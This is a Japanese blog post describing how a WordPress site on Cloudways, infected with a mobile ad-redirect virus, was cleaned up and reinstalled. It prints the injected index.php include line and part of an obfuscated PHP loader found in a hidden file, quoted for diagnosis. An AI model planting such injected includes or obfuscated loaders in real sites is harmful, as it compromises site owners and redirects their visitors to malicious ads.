今日、あるクライアントのウェブサイトに遭遇しました。Cloudwaysのサーバーを使用し、構築されたWordPressウェブサイトは、モバイルでアクセスすると自動的に第三者の広告ウェブサイトにリダイレクトされます。これは明らかにウイルス感染の症状です。本記事では、この広告リダイレクトウイルスをどのようにクリーンアップしたかを記録します。
以前遭遇した広告リダイレクトウイルスと原理はほぼ同じで、どちらもプラグインまたはWordPress自体の脆弱性を介して、サーバーにウイルスファイルがアップロードされています。例えば、index.phpファイルの下で、私たちはこの一連の暗号化されたコードを発見しました。
<?php
/*85ba2*/
@include ("/hom\x65/10579**.cloudwaysapps.com/zmwjzu\x65gcg/public_html/wp\x2dinclud\x65s/blocks/sit\x65\x2dtitl\x65/.c963cc\x65\x65.oti");
/*85ba2*/ファイルは.c963ccee.otiという名前のファイルを指しており、含まれる部分の内容は以下のとおりです:
<?php
$om12efh = pack('H*', '0a0041131e05535551575008'); $ozsfhl = 'xa6fli70284m'; $ozsfhl = $ozsfhl ^ $om12efh;
$o8dk17mz = "";
$o8dk17mz .= $ozsfhl("G%05%19%1E%12%07%06%03%0C%40%0A%10A%09%10MDV%02%0E%3A%06A%01%00%0CV%17fUA%06%02%11%00%0EH%5D%40%24%183RV%05%0A%0B%00%06H%07%1D%5C%06X%5Bl%00%0C%0B%11K%17%006M%11%5CWG%06CBI%0E%5E");
$o8dk17mz .= $ozsfhl("%5DR%24%23PXZ%3C%10%00%11%06H%11%1B%5C%0CKi_%0C%04BI%0E%21%21%25bJ%02vZ%0D%0A%3A%16K%1B%5CNB%0C%5EiV%11%11%0A%17%5DHXI%1EJ%02vZ%0D%0A%3A%16K%1B%5CNC%02AiV%1B%06%06%10");コードが長すぎて完全に解読することはできませんが、Naibaの経験によれば、解読しなくてもこれがウイルスファイルであることがわかります。通常のWordPressプログラムファイルはオープンソースであり、暗号化されたコードは出現しません。
これ以外にも、フォルダの下には他の干渉ファイルがありますが、ここでは一つ一つ列挙しません。
感染方法を分析したので、解決も非常に簡単です。ウイルスファイルを削除し、正常なファイルに置き換えるだけです。
最も簡単な方法は、すべてのWordPressファイルを削除し、再インストールすることです。もちろん、uploadsフォルダ以下のファイルは手動で保持する必要があります。そうしないと、再インストール後にウェブサイトの画像がすべてなくなってしまいます。
Cloudwaysはマネージド型VPSであるため、ユーザーに与えられる権限は最高ではありません。sftpやsshを使用してもウイルスファイルを削除する権限がないため、ここではカスタマーサポートに連絡して処理を依頼する必要があります。
最後に、Cloudways上のウェブサイトがウイルスに感染した後の処理手順:
- 感染状態のウェブサイトデータをバックアップとして準備する;
- wp-content\/uploadsフォルダを除くすべてのファイルとフォルダを削除する(カスタマーサポートに連絡して削除を依頼する必要があります。そうしないと権限が不足します)
- WordPressインストールパッケージを再ダウンロードし、WordPressサイトをインストールします;
- 以前のテーマとプラグインを再インストールします。
この操作が完了すると、ウイルスファイルはなくなります。もし対応できない場合は、有料でNaibaに処理を依頼。
コメントは終了しました
この記事のコメント機能は終了しています。ご質問がある場合は、他の方法でお問い合わせください。